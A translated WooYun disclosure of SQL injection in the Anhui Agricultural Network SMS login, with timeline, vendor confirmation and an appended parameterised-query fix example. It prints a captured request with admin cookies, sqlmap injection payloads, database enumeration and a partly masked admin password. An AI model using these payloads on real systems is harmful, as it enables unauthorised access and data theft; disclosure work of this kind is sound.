
Vulnerability Summary

Defect ID: wooyun-2015-092570

Title: SQL injection in Anhui Agricultural Network (安徽农网)

Affected vendor: 安徽省农村综合经济信息中心 (Anhui Provincial Rural Comprehensive Economic Information Center)

Author: 路人甲

Submitted: 2015-01-20 09:57

Fixed: 2015-03-06 09:58

Published: 2015-03-06 09:58

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-01-20: Details sent to the vendor; awaiting vendor response
2015-01-22: Vendor confirmed; details disclosed to the vendor only
2015-02-01: Details disclosed to core white hats and domain experts
2015-02-11: Details disclosed to regular white hats
2015-02-21: Details disclosed to intern white hats
2015-03-06: Details disclosed to the public

Brief description:

The SMS platform login of Anhui Agricultural Network (安徽农网, http://www.ahnw.gov.cn/) is vulnerable to SQL injection.

Detailed description:

http://www.ahnw.gov.cn/nwsms/

[Screenshot: QQ图片20150118193419.png]


[Screenshot: QQ图片20150118193458.png]


The login form is injectable.

Proof of vulnerability:

Captured request:

POST /nwsms/check_user.asp HTTP/1.1
Host: www.ahnw.gov.cn
Proxy-Connection: keep-alive
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.ahnw.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ahnw.gov.cn/nwsms/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvi=3620698112; ahnw_a1=3; _gscu_36441702=21559889a7v6ia16; ASPSESSIONIDASDCAAQR=LLNEFHLBNINFPPCOJMDIAEIE; Hm_lvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421560469,1421563064,1421566755,1421575818; Hm_lpvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421575818; bg%5Fuser=; name=%C5%A9%CD%F8%B9%DC%C0%ED%D4%B1; UserRight=1%2C2%2C3%2C4%2C0%2C5%2C6; SPID=1; PowerList=%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C34%2C36%2C37%2C1%2C2%2C6%2C40%2C41%2C42%2C44%2C45%2C46%2C47%2C10%2C11%2C12%2C43%2C9%2C3%2C38%2C39%2C999%2C; Smpp=8999; UID=1; Cmpp=8999; userId=admin
userId=*&pwd=1%27&imageField.x=0&imageField.y=0


Run it through sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userId=' AND 1178=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1178=1178) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'jNqc'='jNqc&pwd='&imageField.x=44&imageField.y=12
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: userId=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(85)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(71)+CHAR(107)+CHAR(111)+CHAR(99)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)-- &pwd='&imageField.x=44&imageField.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: userId='; WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: userId=' WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12
---
[19:37:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:37:09] [INFO] fetching current user
current user: 'ahnw.sms'


[19:38:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:38:52] [INFO] fetching database names
[19:38:52] [INFO] the SQL query used returns 168 entries
available databases [159]:


159 databases.
Credentials:
admin/ahnwj*****u
Login succeeded.

[Screenshot: QQ图片20150118194002.png]

Fix recommendation:

#1. Filter user input.
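To make the fix concrete, here is an added example (not the site's own code) of a login check like the one behind check_user.asp, first written with string concatenation and then with bound parameters; the single-quote probe from the proof section (pwd=1') is replayed against both. The users table, its rows and the sqlite3 stand-in for SQL Server are assumptions for the sake of a runnable demonstration.

```python
import sqlite3

# Constructed stand-in for the SMS platform's user table (hypothetical
# schema; the real check_user.asp backs onto Microsoft SQL Server).
_DDL = "CREATE TABLE users (userId TEXT PRIMARY KEY, pwd TEXT NOT NULL)"
_ROWS = [("admin", "correct-horse"), ("operator", "s3cret")]  # constructed


def make_db():
    """Build an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(_DDL)
    conn.executemany("INSERT INTO users VALUES (?, ?)", _ROWS)
    return conn


def check_user_vulnerable(conn, user_id, pwd):
    """Login check built by string concatenation, the pattern behind the
    report: the pwd=1' probe breaks the quoting and the DBMS reports a
    syntax error, which is what sqlmap's error-based technique keys on."""
    sql = ("SELECT COUNT(*) FROM users WHERE userId = '" + user_id +
           "' AND pwd = '" + pwd + "'")
    return conn.execute(sql).fetchone()[0] > 0


def check_user_fixed(conn, user_id, pwd):
    """The same check with bound parameters: the driver sends the values
    separately from the statement text, so a quote in the input is just
    a character in the comparison. pyodbc against SQL Server uses the
    same '?' placeholder syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE userId = ? AND pwd = ?"
    return conn.execute(sql, (user_id, pwd)).fetchone()[0] > 0


def probe_breaks_query(conn):
    """Replay the report's probe (pwd=1') against the vulnerable check and
    report whether the DBMS rejected the statement outright."""
    try:
        check_user_vulnerable(conn, "admin", "1'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("probe breaks concatenated query:", probe_breaks_query(db))
    print("fixed check rejects probe:", not check_user_fixed(db, "admin", "1'"))
    print("fixed check accepts real creds:",
          check_user_fixed(db, "admin", "correct-horse"))
```

Filtering characters can be layered on top, but binding parameters removes the class of bug rather than chasing individual payloads.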

Copyright notice: reproduction must credit the source, 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-01-22 16:46

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded via CNCERT to the Anhui branch center, which will coordinate handling with the site's operating unit.

Latest status:

None yet